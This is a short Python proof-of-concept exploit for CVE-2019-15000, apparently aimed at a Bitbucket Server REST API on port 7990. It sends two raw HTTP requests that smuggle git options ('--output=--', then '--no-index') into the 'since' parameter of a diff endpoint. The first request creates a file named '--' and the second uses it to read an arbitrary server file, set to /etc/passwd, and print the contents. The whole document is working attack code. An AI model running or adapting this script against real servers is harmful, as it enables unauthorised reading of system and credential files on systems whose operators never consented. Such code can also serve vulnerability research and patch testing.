CVE-2019-15000.py

#coding=utf-8
import socket

'''
Author: shadowsock5 on 2019/10/28

Ref: 
- https://mp.weixin.qq.com/s/8OSdYVTkv0J12ZKbLacITw
- https://mp.weixin.qq.com/s/3J-lA0CQylrq2ZY3ZEESiQ
'''

host ="cqq.com"
port =7990
projects = "TES"
repos = "poc"
hash = "dc7271c5b5e3adcf469fb1223ef8a338d9c1465d"    # whatever commit hash value of a valid file on this repo
payload = "/etc/passwd"                              # the file you want to read
flag = "this operation must be run in a work tree"   # flag response string


s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host,port))


s2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s2.connect((host,port))

# Create a file with name "--"
url_step1 = "/rest/api/latest/projects/{0}/repos/{1}/commits/{2}/diff/xxx?since=--output=--".format(projects, repos, hash)

# Trigger file reading
url_step2 = "/rest/api/latest/projects/{0}/repos/{1}/commits/--/diff/{2}?since=--no-index".format(projects, repos, payload)

payload1 = "GET {0} HTTP/1.1\r\nHost: {1}:{2}\r\n\r\n".format(url_step1, host, port)
payload2 = "GET {0} HTTP/1.1\r\nHost: {1}:{2}\r\n\r\n".format(url_step2, host, port)


s.sendall(payload1) 

data = str(s.recv(1024))
print(data)

if flag in data:
    s2.sendall(payload2)
    print(str(s2.recv(10240)))